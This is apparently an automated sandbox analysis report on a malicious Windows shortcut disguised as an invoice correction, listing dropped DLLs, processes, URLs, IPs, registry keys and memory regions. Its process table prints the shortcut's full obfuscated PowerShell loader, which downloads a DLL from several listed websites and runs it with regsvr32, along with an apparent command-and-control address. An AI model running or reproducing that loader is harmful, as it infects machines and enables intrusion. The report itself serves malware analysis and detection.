Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Rechnungskorrektur 2022.20.05_1305.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Fri May 20 06:40:44 2022, atime=Fri Feb 4 06:07:07 2022, length=289792,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUS
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\UjKMhzOwg\JWwyPPSZDhCDc.dll (copy)
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x327a5cf0, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, 61480 bytes, 1 file
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtqidudl.edj.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjimkgkg.bpr.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Documents\20220523\PowerShell_transcript.123716.8mu6q_Jh.20220523085746.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
|
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
|
modified
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e
-c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq);
iex ($YnYHG)}
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq);
iex ($YnYHG)}"
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
|
|
|
|
C:\Windows\System32\svchost.exe
|
c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll"
|
|
|
|
C:\Windows\System32\svchost.exe
|
c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k NetworkService -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
|
|
|
|
C:\Windows\System32\svchost.exe
|
c:\windows\system32\svchost.exe -k unistacksvcgroup
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\SgrmBroker.exe
|
C:\Windows\system32\SgrmBroker.exe
|
||
|
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 9 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://173.82.82.196:8080/t
|
unknown
|
|
|
|
http://mandom.co.id/assets/TpIIt7SmNBsWCECLoHrS/
|
103.89.5.69
|
|
|
|
https://173.82.82.196:8080/tem
|
unknown
|
|
|
|
http://pacemaker.cd/images/Xc/
|
unknown
|
|
|
|
https://173.82.82.196/
|
unknown
|
|
|
|
https://173.82.82.196:8080/
|
unknown
|
|
|
|
http://masidiomas.com/D4WStats/GAhmgvhLgUn6/
|
unknown
|
|
|
|
https://bpsjambi.id/about/VPe69A9Tk/
|
unknown
|
|
|
|
http://marmaris.com.br/wp-admin/2cfpSuAH/
|
unknown
|
|
|
|
https://dev.ditu.live.com/REST/v1/Routes/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Driving
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
|
unknown
|
||
|
https://t0.tiles.ditu.live.com/tiles/gen
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Walking
|
unknown
|
||
|
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
|
unknown
|
||
|
https://dev.ditu.live.com/mapcontrol/logging.ashx
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
|
unknown
|
||
|
http://mandom.co.id/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
|
unknown
|
||
|
http://crl.microso
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://mandom.co
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.bingmapsportal.com
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
|
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://yamada-shoshi.main.jp/yamada-shoshi/V61hH/
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Transit/Stops/
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
|
unknown
|
||
|
http://mandom.co.id
|
unknown
|
||
|
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
|
unknown
|
||
|
https://%s.xboxlive.com
|
unknown
|
||
|
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Locations
|
unknown
|
||
|
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
|
unknown
|
||
|
https://dev.virtualearth.net/mapcontrol/logging.ashx
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
|
unknown
|
||
|
https://dynamic.t
|
unknown
|
||
|
http://mandom.co.idx
|
unknown
|
||
|
https://dev.virtualearth.net/REST/v1/Routes/Transit
|
unknown
|
||
|
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
|
unknown
|
||
|
https://activity.windows.com
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/Locations
|
unknown
|
||
|
https://%s.dnet.xboxlive.com
|
unknown
|
||
|
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
|
unknown
|
||
|
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
|
unknown
|
There are 51 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mandom.co.id
|
103.89.5.69
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
173.82.82.196
|
unknown
|
United States
|
|
|
|
192.168.2.1
|
unknown
|
unknown
|
||
|
103.89.5.69
|
mandom.co.id
|
Indonesia
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
|
cval
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
|
cval
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-100
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-101
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\system32\dnsapi.dll,-103
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f1\52C64B7E
|
@%SystemRoot%\system32\NgcRecovery.dll,-100
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage
|
MonthID
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 16 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1DE0000
|
direct allocation
|
page execute and read and write
|
|
|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
730000
|
direct allocation
|
page execute and read and write
|
|
|
|
17433000000
|
heap
|
page read and write
|
||
|
2CB7F45C000
|
heap
|
page read and write
|
||
|
F7754FD000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
25282EDF000
|
heap
|
page read and write
|
||
|
1FF4B258000
|
heap
|
page read and write
|
||
|
25282DB0000
|
heap
|
page read and write
|
||
|
20E431F0000
|
heap
|
page read and write
|
||
|
2B983F74000
|
heap
|
page read and write
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
2B983320000
|
heap
|
page read and write
|
||
|
AE9515000
|
stack
|
page read and write
|
||
|
17433102000
|
heap
|
page read and write
|
||
|
166F7E70000
|
trusted library allocation
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
217E428E000
|
heap
|
page read and write
|
||
|
2B983F74000
|
heap
|
page read and write
|
||
|
F7753FE000
|
stack
|
page read and write
|
||
|
2E1BD8DE000
|
heap
|
page read and write
|
||
|
217E4200000
|
heap
|
page read and write
|
||
|
2B983CE0000
|
remote allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2CB7FAE0000
|
remote allocation
|
page read and write
|
||
|
28287029000
|
heap
|
page read and write
|
||
|
20E43302000
|
heap
|
page read and write
|
||
|
2E1B8E20000
|
trusted library section
|
page readonly
|
||
|
AEAA0F000
|
stack
|
page read and write
|
||
|
17432E60000
|
heap
|
page read and write
|
||
|
28286F10000
|
heap
|
page read and write
|
||
|
7FFF7F132000
|
trusted library allocation
|
page read and write
|
||
|
1D4A3C58000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
166F8160000
|
trusted library allocation
|
page read and write
|
||
|
6E51B7E000
|
stack
|
page read and write
|
||
|
AEA8CE000
|
stack
|
page read and write
|
||
|
2A5E000
|
heap
|
page read and write
|
||
|
166DF735000
|
heap
|
page read and write
|
||
|
2CB7FA60000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
166F7D31000
|
trusted library allocation
|
page read and write
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
2B983F8B000
|
heap
|
page read and write
|
||
|
166F7F12000
|
heap
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
2CB7FAE0000
|
remote allocation
|
page read and write
|
||
|
28287071000
|
heap
|
page read and write
|
||
|
17432E50000
|
heap
|
page read and write
|
||
|
2B9834E3000
|
heap
|
page read and write
|
||
|
2B9833B0000
|
trusted library allocation
|
page read and write
|
||
|
2A0B000
|
heap
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
FB81779000
|
stack
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
1A6000
|
stack
|
page read and write
|
||
|
BA8617C000
|
stack
|
page read and write
|
||
|
166F7D37000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
remote allocation
|
page read and write
|
||
|
7FFF7F190000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8E50000
|
trusted library section
|
page readonly
|
||
|
2B983F96000
|
heap
|
page read and write
|
||
|
2AA6000
|
heap
|
page read and write
|
||
|
2E1B8918000
|
heap
|
page read and write
|
||
|
166DDC60000
|
heap
|
page read and write
|
||
|
209F5A28000
|
heap
|
page read and write
|
||
|
2E1B7EFA000
|
heap
|
page read and write
|
||
|
217E4170000
|
heap
|
page read and write
|
||
|
1FF4B234000
|
heap
|
page read and write
|
||
|
2512667D000
|
heap
|
page read and write
|
||
|
2CB7F402000
|
heap
|
page read and write
|
||
|
2961000
|
heap
|
page read and write
|
||
|
AE95DF000
|
stack
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2B983380000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B302000
|
heap
|
page read and write
|
||
|
217E4160000
|
heap
|
page read and write
|
||
|
209F5850000
|
heap
|
page read and write
|
||
|
2E1BD80E000
|
heap
|
page read and write
|
||
|
7FFF7F210000
|
trusted library allocation
|
page read and write
|
||
|
166F7D00000
|
trusted library allocation
|
page read and write
|
||
|
2B98349A000
|
heap
|
page read and write
|
||
|
720000
|
direct allocation
|
page execute and read and write
|
||
|
209F5840000
|
heap
|
page read and write
|
||
|
58F5E7E000
|
stack
|
page read and write
|
||
|
166DDCAB000
|
heap
|
page read and write
|
||
|
1FF4B213000
|
heap
|
page read and write
|
||
|
2B983F78000
|
heap
|
page read and write
|
||
|
166F7F12000
|
heap
|
page read and write
|
||
|
17433040000
|
heap
|
page read and write
|
||
|
166E082B000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
29C5000
|
heap
|
page read and write
|
||
|
6E51EFD000
|
stack
|
page read and write
|
||
|
F7752FC000
|
stack
|
page read and write
|
||
|
7B5000
|
heap
|
page read and write
|
||
|
A70000
|
remote allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
A4AC57F000
|
stack
|
page read and write
|
||
|
DB47479000
|
stack
|
page read and write
|
||
|
7FFF7F2B0000
|
trusted library allocation
|
page read and write
|
||
|
166E07D7000
|
trusted library allocation
|
page read and write
|
||
|
2B983E02000
|
heap
|
page read and write
|
||
|
166DDD1E000
|
heap
|
page read and write
|
||
|
2B98343C000
|
heap
|
page read and write
|
||
|
58F5F7B000
|
stack
|
page read and write
|
||
|
FB81AFF000
|
stack
|
page read and write
|
||
|
780000
|
trusted library allocation
|
page read and write
|
||
|
58F6177000
|
stack
|
page read and write
|
||
|
166F7CE1000
|
trusted library allocation
|
page read and write
|
||
|
AE9A7E000
|
stack
|
page read and write
|
||
|
1FF4B25F000
|
heap
|
page read and write
|
||
|
7FFF7F250000
|
trusted library allocation
|
page read and write
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
A70000
|
remote allocation
|
page read and write
|
||
|
37ADE7E000
|
stack
|
page read and write
|
||
|
2CB7F45A000
|
heap
|
page read and write
|
||
|
2CB7F413000
|
heap
|
page read and write
|
||
|
217E4284000
|
heap
|
page read and write
|
||
|
1E10000
|
heap
|
page readonly
|
||
|
20E43D32000
|
heap
|
page read and write
|
||
|
2E1BD580000
|
trusted library allocation
|
page read and write
|
||
|
2B983F86000
|
heap
|
page read and write
|
||
|
7FFFE2202000
|
unkown
|
page readonly
|
||
|
2B983FBF000
|
heap
|
page read and write
|
||
|
2E1B8E00000
|
trusted library section
|
page readonly
|
||
|
F0000
|
heap
|
page read and write
|
||
|
7FFF7F240000
|
trusted library allocation
|
page read and write
|
||
|
2E1BD584000
|
trusted library allocation
|
page read and write
|
||
|
166DF6D0000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166DDC30000
|
heap
|
page read and write
|
||
|
2E1BD570000
|
trusted library allocation
|
page read and write
|
||
|
6E51FFD000
|
stack
|
page read and write
|
||
|
A95000
|
heap
|
page read and write
|
||
|
58F5BEE000
|
stack
|
page read and write
|
||
|
166F7F0A000
|
heap
|
page read and write
|
||
|
2AA6000
|
heap
|
page read and write
|
||
|
7FFF7F2D0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F2C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFFE220F000
|
unkown
|
page readonly
|
||
|
20E432BE000
|
heap
|
page read and write
|
||
|
7FFF7F2F0000
|
trusted library allocation
|
page read and write
|
||
|
A70000
|
remote allocation
|
page read and write
|
||
|
1D4A3C75000
|
heap
|
page read and write
|
||
|
7FFFE21E1000
|
unkown
|
page execute read
|
||
|
166F7CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B27C000
|
heap
|
page read and write
|
||
|
2B9834EE000
|
heap
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
2E1B7F13000
|
heap
|
page read and write
|
||
|
166F7D38000
|
trusted library allocation
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
2E1BD420000
|
trusted library allocation
|
page read and write
|
||
|
AEAB0C000
|
stack
|
page read and write
|
||
|
166F7F0D000
|
heap
|
page read and write
|
||
|
BA85C7E000
|
stack
|
page read and write
|
||
|
3C0000
|
remote allocation
|
page read and write
|
||
|
5C17FFC000
|
stack
|
page read and write
|
||
|
58F5B6B000
|
stack
|
page read and write
|
||
|
20E4326E000
|
heap
|
page read and write
|
||
|
209F5B02000
|
heap
|
page read and write
|
||
|
2A2A000
|
heap
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
6E51DFE000
|
stack
|
page read and write
|
||
|
29FB000
|
heap
|
page read and write
|
||
|
6E51D7D000
|
stack
|
page read and write
|
||
|
166F7D31000
|
trusted library allocation
|
page read and write
|
||
|
166F8140000
|
trusted library allocation
|
page read and write
|
||
|
166DF5D0000
|
trusted library allocation
|
page read and write
|
||
|
166F80D0000
|
trusted library allocation
|
page read and write
|
||
|
2CB7F487000
|
heap
|
page read and write
|
||
|
28287083000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
1FF4B246000
|
heap
|
page read and write
|
||
|
275E000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
2E1B8815000
|
heap
|
page read and write
|
||
|
166F7CE0000
|
trusted library allocation
|
page read and write
|
||
|
DBFF3FE000
|
stack
|
page read and write
|
||
|
2A5A000
|
heap
|
page read and write
|
||
|
FB8187A000
|
stack
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
37AE07D000
|
stack
|
page read and write
|
||
|
BA85AFE000
|
stack
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
29D6000
|
heap
|
page read and write
|
||
|
7FFF7F189000
|
trusted library allocation
|
page read and write
|
||
|
2B983FA9000
|
heap
|
page read and write
|
||
|
166F7D50000
|
trusted library allocation
|
page read and write
|
||
|
166F7F0E000
|
heap
|
page read and write
|
||
|
1FF4B285000
|
heap
|
page read and write
|
||
|
2CB7F44C000
|
heap
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
886000
|
heap
|
page read and write
|
||
|
1FF4B256000
|
heap
|
page read and write
|
||
|
2CB7F448000
|
heap
|
page read and write
|
||
|
2B983FCC000
|
heap
|
page read and write
|
||
|
37AE27F000
|
stack
|
page read and write
|
||
|
37AE17E000
|
stack
|
page read and write
|
||
|
28287108000
|
heap
|
page read and write
|
||
|
1FF4B262000
|
heap
|
page read and write
|
||
|
AE9E7C000
|
stack
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7CCB000
|
heap
|
page read and write
|
||
|
1DAAF7E000
|
stack
|
page read and write
|
||
|
166DDCE5000
|
heap
|
page read and write
|
||
|
2A1B000
|
heap
|
page read and write
|
||
|
2A01000
|
heap
|
page read and write
|
||
|
7FFF7F230000
|
trusted library allocation
|
page read and write
|
||
|
166E087B000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
2E1B7E13000
|
heap
|
page read and write
|
||
|
2E1BD670000
|
trusted library allocation
|
page read and write
|
||
|
7FFF7F1E0000
|
trusted library allocation
|
page read and write
|
||
|
166F7D10000
|
trusted library allocation
|
page read and write
|
||
|
29FB000
|
heap
|
page read and write
|
||
|
2A53000
|
heap
|
page read and write
|
||
|
217E4252000
|
heap
|
page read and write
|
||
|
217E4275000
|
heap
|
page read and write
|
||
|
2E1B9390000
|
trusted library allocation
|
page read and write
|
||
|
2E1B7E9D000
|
heap
|
page read and write
|
||
|
209F59B0000
|
trusted library allocation
|
page read and write
|
||
|
166F7F12000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166DDDF5000
|
heap
|
page read and write
|
||
|
1FF4B22C000
|
heap
|
page read and write
|
||
|
166F7D30000
|
trusted library allocation
|
page read and write
|
||
|
166F7D40000
|
trusted library allocation
|
page read and write
|
||
|
166F7C89000
|
heap
|
page read and write
|
||
|
2E1BD6A0000
|
remote allocation
|
page read and write
|
||
|
2E1B8802000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
2E1B7E73000
|
heap
|
page read and write
|
||
|
2512665A000
|
heap
|
page read and write
|
||
|
2CB7F42A000
|
heap
|
page read and write
|
||
|
217E424D000
|
heap
|
page read and write
|
||
|
166F7C6B000
|
heap
|
page read and write
|
||
|
2B983513000
|
heap
|
page read and write
|
||
|
29E9000
|
heap
|
